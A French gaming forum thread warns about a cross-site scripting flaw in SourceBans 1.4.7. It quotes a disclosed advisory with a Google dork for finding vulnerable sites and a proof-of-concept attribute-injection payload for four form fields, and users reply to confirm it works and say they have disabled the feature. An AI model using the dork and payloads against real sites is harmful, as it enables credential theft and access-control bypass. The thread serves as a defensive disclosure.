SourceBans Vulnerability (XSS)

[cmer]

Salut,

 

Il existe un faille sur le sourcebans afin de vous protéger veuillez désactiver le submitBan

 

 

# Exploit Title: SourceBans Version 1.4.7 XSS
# Google Dork: inurl:"sourcebans/index.php?p=submit"
# Date: Feb. 9th 2011
# Author: Sw1tCh
# Software Link: http://www.sourcebans.net/
# Version: 1.4.7


Info:
SourceBans is an application for managing publicly the banned users for a Steam Server. 

#-= The Advisory =-
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.

#-= Example =-

http://<SITE>/sourcebans/index.php?p=submit

- > BanIP => " onmouseover=prompt(928137) bad="
- > Comments => " onmouseover=prompt(928137) bad="
- > Name => " onmouseover=prompt(928137) bad="
- > Email => " onmouseover=prompt(928137) bad="




#Disclosure Information:
- Vulnerability found and researched: January 18th 2011
- Vendor (SourceBans) contacted: January 18th 2011
[ Time Reduced because Ops of IRC channel were dicks ] 
- Disclosed to Exploit-DB, Bugtraq and InterN0T: 





#Credits: Sw1tCh

#Shoutouts : gen0cide, Scruffy, Griff, D00dl3, 

 

Un patch devrez voir le jour bientôt :)

[Borisbe]

Salut,

 

Merci Cmer pour l'info.

Edited February 10, 2011 by Borisbe

[Papy___]

cmer parmi nous ouééééééé ^^

 

Thx de l'info ;-)

[cmer]

cmer parmi nous ouééééééé ^^

 

Thx de l'info ;-)

 

Tu me suit partout toi décidément :p

[Papy___]

Tu me suit partout toi décidément :p

 

sur ce forum c'est toi qui me suit lol ^^

[Borisbe]

Je confirme que la faille fonctionne bien.

[Nicko]

Merci de l'info. Moi je l'avais déjà désactiver de tout façon :)